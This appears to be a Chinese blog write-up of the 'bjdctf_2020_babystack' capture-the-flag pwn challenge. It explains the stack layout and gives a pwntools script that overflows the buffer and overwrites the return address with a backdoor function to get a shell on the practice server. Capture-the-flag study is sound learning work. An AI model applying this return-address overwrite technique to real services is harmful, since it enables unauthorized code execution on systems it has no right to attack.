bjdctf_2020_babystack题解

1.checksec查看程序

2.ida64打开

先输入一个整形数据用于确定buf串需要读入多少个字节,这里后续使用的是0x111

 

并且这题已经给出了后门函数backdoor

 

3.查看nbytes和buf的栈空间 

nbytes在buf下方,并且nbytes是qword类型,占8个字节

 

 4.脚本

这题思路并不复杂

首先输入一个足以覆盖掉返回地址的数字

再发送覆盖数据覆盖掉返回地址执行backdoor函数即可

推荐文章:

1.Pwn基础知识笔记 对recvuntil等函数有解释

2.pwn中str()与p64 解释了为什么第一次send要使用字符串类型而不能直接发送int类型

send是模拟交互的情况,如果使用send(0x111)会有报错,并且发送的字符串要带上换行符,否则会无法结束输入

from pwn import * 
context.log_level='debug' 
p=remote("node4.buuoj.cn",26787)
p.recvuntil("[+]Please input the length of your name:")#等接收到这个字符串再发送数据
p.send(str(0x111)+'\n')    
#以字符串形式发送,服务器会收到b'273\n',这个\n也是必须的,否则会出现一直等待数据输入的情况
payload=b'a'*12+p64(0x111)+b'b'*4+p64(0x4006e6)
p.recvuntil("[+]What's u name?")#覆盖a同时保留nbytes的数值,修改返回地址执行/bin/sh
p.send(payload)		
p.interactive()

5.获取flag

 不过这里还有一个异或就是本机运行该程序不能成功获取执行权,非常奇怪

 

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

OrientalGlass

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值